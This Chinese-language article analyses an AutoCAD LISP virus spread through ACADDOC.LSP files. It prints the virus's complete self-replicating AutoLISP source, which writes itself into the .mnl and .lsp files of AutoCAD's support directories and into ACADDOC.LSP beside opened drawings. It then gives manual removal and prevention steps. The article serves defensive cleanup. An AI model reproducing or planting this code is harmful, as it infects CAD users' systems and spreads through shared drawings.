一种CAD病毒的清除与防范措施
一种CAD病毒的清除与防范措施
雪山飞猪 QQ534455
近来又出现一种AutoCAD病毒,该病毒与以往CAD病毒不同。干净的CAD 系统当打开DWG图时,如果该图所在目录下有ACADDOC.LSP文件(基本为病毒传播文件),ACADDOC.LSP就会运行。
1.病毒的特征与传播方式
我们先看看病毒代码,代码如下:
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(progn
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
);while
(close wjm1)
);progn
);if
(if flag1
(progn
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
);progn
);if
);while
(close wjm1)
(close wjm)
);progn
);if
);defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
);while
);progn
);if
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist))) (setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn (1+ lspn))
(load "acadapq")
(princ)
(load "acadapp")
(princ)
(load "acadapq")
(princ)
病毒代码运行后,首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。support目录下的ACADDOC.LSP文件可能会被杀毒软件杀掉,但写入其他mnl和lsp文件中的病毒代码并未被清除,这就是为什么杀毒软件不能彻底杀CAD病毒的原因。
染毒后的病毒会在打开的DWG文件的目录下把病毒代码附加在ACADDOC.LSP 文件的尾部,如无ACADDOC.LSP文件就会创建新的并把病毒代码附加上。
从上我们可以看出,如在打开的DWG文件目录下有含病毒代码的ACADDOC.LSP文件,CAD病毒就会传播开。
2.病毒的清除
用写字板编辑中毒的mnl和lsp文件,从头开始找发现第一个(setq flagx t)时,把其及以后的代码通通去掉。举例说明,我的CAD系统有两个目录会有染毒文件,一是C:\Documents and Settings\XXX\Application Data\Autodesk\AutoCAD Mechanical 2011\R18.1\chs\Support(XXX为你登录XP系统的用户名);二是D:\Program Files\Autodesk\ACADM 2011\Support。
同时要检查所有目录包括隐藏的目录是否有ACADDOC.LSP文件,有则删除。
3.防范措施
一是把病毒要感染的文件设为只读,二是在打开DWG图时,看看该DWG文件所在目录下是否有ACADDOC.LSP文件,有则先删除再打开DWG图。
(注:可编辑下载,若有不当之处,请指正,谢谢!)